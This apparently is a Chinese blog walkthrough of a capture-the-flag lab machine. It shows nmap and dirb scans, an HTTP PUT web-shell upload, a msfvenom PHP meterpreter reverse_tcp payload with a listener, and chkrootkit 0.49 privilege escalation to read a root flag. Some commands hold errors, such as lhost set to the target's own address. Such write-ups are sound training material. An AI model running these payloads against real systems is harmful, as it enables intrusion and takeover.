综合靶机渗透测试解析

综合靶机渗透测试

任务环境说明:

 服务器场景:ZHCS-2(关闭连接)

 服务器场景操作系统:版本不详  

1. 扫描目标靶机将靶机开放的所有端口,当作 flag 提交(例:21,22,23)

2.扫描目标靶机将靶机的http服务版本信息当作flag提交(例:apache 2.3.4)

3.靶机网站存在目录遍历漏洞,请将html页面中的倒数第二行中的name当作flag提交;

4.使用kali对目标靶机进行渗透测试,将目标内核版本当作flag值提交;

5.该靶机存在提权漏洞,请将存在提权漏洞的程序名当作flag值提交;

6.在kali中搜索该提权漏洞,并将漏洞的披露时间当作flag值提交.(例:2023-05-26);

7.root家目录下存在一个***.txt文件,文件名+文件内容当作flag提交,用+号连接(例:***.txt+qwoingqwoighoqisfhoasf)

1. 扫描目标靶机将靶机开放的所有端口,当作 flag 提交(例:21,22,23)

nmap -sV 192.168.94.156

flag{22,80}

2.扫描目标靶机将靶机的http服务版本信息当作flag提交(例:apache 2.3.4)

nmap -sV 192.168.94.156

 flag{lighttpd 1.4.28}

3.靶机网站存在目录遍历漏洞,请将html页面中的倒数第二行中的name当作flag提交;

先用dirb扫描该靶机的网页

drib http://192.168.94.156

 然后使用浏览器访问该网页

 得到flag{Parent Directory}

4.使用kali对目标靶机进行渗透测试,将目标内核版本当作flag值提交;

使用bp抓

 放到Repeater模式下,然后经过尝试,发现可以直接使用PUT方法上传一句话木马

 然后使用菜刀连接

 连接成功后进入终端

得到flag{Ubuntu 12.04.4 LTS} 

5.该靶机存在提权漏洞,请将存在提权漏洞的程序名当作flag值提交;

这里要用到反弹shell木马

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.94.156 lport=443 R >php_shell.php

 生成木马文件后上传木马文件到test目录中

 然后使用msf来监听

然后返回网页刷新点击上传的木马文件,使其保持运行状态 

 返回msf监听查看反弹shell是否链接成功

成功返回后,shell进入,然后使用

python -c 'import pty:pty.spawn("/bin/bash")'

 

查看一下系统的全部信息

whoami;pwd;uname -a

 然后使用ls -la /etc/crom*查看文件

 发现在/etc/cron.daily目录下有一个工具(chkrootkit)然后我们查一下这个工具的版本

chkrootkit -V

flag{chkrootkit version 0.49} 

6.在kali中搜索该提权漏洞,并将漏洞的披露时间当作flag值提交.(例:2023-05-26);

这里我们直接去msf里搜chkrootkit

 得到flag{2014-06-04}

7.root家目录下存在一个***.txt文件,文件名+文件内容当作flag提交,用+号连接(例:***.txt+qwoingqwoighoqisfhoasf)

现在我们需要提权到root权限中(如图):

 

提权成功后进入/root目录下

再用cat命令查看即可

得到flag{7d03aaa2bf93d80040f3f22ec6ad9d5a.txt+ease to struggle and you cease to live}

感谢@搞安全的藤原拓海的帮助

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值